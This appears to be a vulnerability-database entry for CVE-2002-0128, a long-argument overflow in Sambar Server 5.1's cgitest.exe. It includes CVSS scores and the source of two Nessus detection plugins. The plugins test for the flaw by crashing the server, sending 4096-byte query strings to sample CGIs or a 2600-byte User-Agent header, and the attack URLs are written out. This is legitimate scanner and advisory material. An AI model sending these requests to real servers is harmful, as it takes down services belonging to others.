Vulnerabilities > CVE-2002-0128 - Denial Of Service vulnerability in Sambar Server 5.1

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
sambar
nessus
exploit available

Summary

cgitest.exe in Sambar Server 5.1 before Beta 4 allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a long argument.

Vulnerable Configurations

Part Description Count
Application
Sambar
1

Exploit-Db

descriptionSambar Server 5.1 Sample Script Denial Of Service Vulnerability. CVE-2002-0128. Dos exploit for windows platform
idEDB-ID:21228
last seen2016-02-02
modified2002-02-06
published2002-02-06
reporterTamer Sahin
sourcehttps://www.exploit-db.com/download/21228/
titleSambar Server 5.1 - Sample Script Denial of Service Vulnerability

Nessus

  • NASL familyCGI abuses
    NASL idSAMBAR_DOS.NASL
    descriptionIt is possible to kill the Sambar web server
    last seen2020-06-01
    modified2020-06-02
    plugin id11131
    published2002-09-21
    reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/11131
    titleSambar Server Multiple CGI Remote Overflow
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    # References:
    # From: "Tamer Sahin" <[email protected]>
    # To: [email protected]
    # Subject: Sambar Webserver v5.1 DoS Vulnerability
    # Date: Wed, 16 Jan 2002 01:57:17 +0200
    # Affiliation: http://www.securityoffice.net
    #
    # Vulnerables:
    # Sambar WebServer v5.1 
    # NB: this version of Sambar is also vulnerable to a too long HTTP field.
    #
    
    
    include("compat.inc");
    
    if(description)
    {
     script_id(11131);
     script_version ("1.25");
    
     script_cve_id("CVE-2002-0128");
     script_bugtraq_id(3885);
    
     script_name(english:"Sambar Server Multiple CGI Remote Overflow");
     
     script_set_attribute(attribute:"synopsis", value:
    "The remote web server is vulnerable to a denial of service." );
     script_set_attribute(attribute:"description", value:
    "It is possible to kill the Sambar web server 'server.exe' by sending it
    a long request like:
    	/cgi-win/testcgi.exe?XXXX...X
    	/cgi-win/cgitest.exe?XXXX...X
    	/cgi-win/Pbcgi.exe?XXXXX...X
    (or maybe in /cgi-bin/)
    
    An attacker may use this flaw to cause the server to crash continuously." );
     script_set_attribute(attribute:"solution", value:
    "Upgrade the server to Sambar 51p or delete those CGI." );
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
     script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
     script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
     script_set_attribute(attribute:"exploit_available", value:"false");
    
     script_set_attribute(attribute:"plugin_publication_date", value: "2002/09/21");
     script_set_attribute(attribute:"vuln_publication_date", value: "2002/01/16");
     script_cvs_date("Date: 2018/07/27 18:38:14");
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_end_attributes();
    
     script_summary(english:"Crashes Sambar web server");
     script_category(ACT_DENIAL);
     
     script_copyright("This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
     script_family(english:"CGI abuses");
     script_dependencies("find_service1.nasl", "http_version.nasl");
     script_require_ports("Services/www", 80);
     script_require_keys("www/sambar", "Settings/ParanoidReport");
     exit(0);
    }
    
    # The script code starts here
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    # The advisories are not clear: is this cgitest.exe or testcgi.exe?
    # Is it in cgi-bin or cgi-win?
    dir[0] = "";		# Keep it here or change code below
    dir[1] = "/cgi-bin/";
    dir[2] = "/cgi-win/";
    
    fil[0] = "cgitest.exe";
    fil[1] = "testcgi.exe";
    fil[2] = "Pbcgi.exe";
    
    port = get_http_port(default:80);
    
    banner = get_http_banner(port: port);
    if (! banner || ! egrep(string: banner, pattern: "^Server:.*SAMBAR")) exit(0);
    
    
    if (http_is_dead(port:port)) exit(0);
    
    # TBD: request each URL a few times...
    function test_port(port, cgi)
    {
     local_var r, req, soc;
     r = http_send_recv3(method: "GET", port: port, item: strcat(cgi, "?", crap(4096)));
     if (isnull(r)) return 1;
     return(0);
    }
    
    for (c=0; c<3; c=c+1) {
     # WARNING! Next loop start at 1, not 0 !
     for (d=1; d<3; d=d+1) {
      if (test_port(port: port, cgi: string(dir[d], fil[c]))) break;
     }
    }
    
    if (http_is_dead(port:port, retry: 3)) security_warning(port);
    
  • NASL familyCGI abuses
    NASL idCGITEST.NASL
    descriptionThe remote host is running a vulnerable version of Sambar Server, a web server and web proxy. There is a remote buffer overflow vulnerability in
    last seen2020-06-01
    modified2020-06-02
    plugin id10040
    published1999-11-18
    reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/10040
    titleSambar Server cgitest.exe Remote Overflow
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
     script_id(10040);
     script_version("1.44");
     script_cvs_date("Date: 2018/11/15 20:50:16");
    
     script_cve_id("CVE-2002-0128");
     script_bugtraq_id(3885);
    
     script_name(english:"Sambar Server cgitest.exe Remote Overflow");
     script_summary(english:"Checks for the /cgi-bin/cgitest.exe buffer overrun");
    
     script_set_attribute(attribute:"synopsis", value:
    "The web application installed on the remote host has a buffer overflow
    vulnerability.");
     script_set_attribute(attribute:"description", value:
    "The remote host is running a vulnerable version of Sambar Server, a
    web server and web proxy.
    
    There is a remote buffer overflow vulnerability in 'cgitest.exe'. A
    remote attacker could use this to crash the web server, or potentially
    execute arbitrary code.");
     script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Jan/188");
     script_set_attribute(attribute:"solution", value:"Remove the affected file from /cgi-bin.");
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
     script_set_cvss_temporal_vector("CVSS2#E:F/RL:W/RC:ND");
     script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"true");
    
     script_set_attribute(attribute:"vuln_publication_date", value:"2002/01/16");
     script_set_attribute(attribute:"plugin_publication_date", value:"1999/11/18");
    
     script_set_attribute(attribute:"potential_vulnerability", value:"true");
     script_set_attribute(attribute:"plugin_type", value:"remote");
     script_end_attributes();
    
     script_category(ACT_DENIAL);
     script_family(english:"CGI abuses");
    
     script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
    
     script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
     script_exclude_keys("Settings/disable_cgi_scanning");
     script_require_keys("Settings/ParanoidReport");
     script_require_ports("Services/www", 80);
    
     exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    
    if (report_paranoia < 2) audit(AUDIT_PARANOID);
    
    port = get_http_port(default:80);
    
    if (http_is_dead(port: port)) exit(1, "The web server on port "+port+" is dead.");
    
    flag = 0;
    directory = "";
    
    foreach dir (cgi_dirs())
    {
     if (is_cgi_installed3(item:string(dir, "/cgitest.exe"), port:port, exit_on_fail: 1))
     {
      flag = 1;
      directory = dir;
      break;
     }
    }
    
    if(!flag)exit(0, "cgitest.exe was not found on port "+port+".");
    data = string(directory, "/cgitest.exe");
    user_agent = make_array("User-Agent", crap(2600));
    r = http_send_recv3(method:"GET", item:data, port:port, add_headers:user_agent, exit_on_fail: 0);
    if (isnull(r)) security_hole(port);